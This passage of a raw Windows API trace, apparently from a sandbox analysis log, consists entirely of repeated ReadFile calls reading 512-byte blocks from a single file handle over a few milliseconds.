lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.276] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, 
lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.277] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile 
(in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.278] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 
[0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.279] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, 
lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, 
lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.280] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: 
lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.281] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, 
lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.282] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.283] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.284] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, 
lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.285] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, 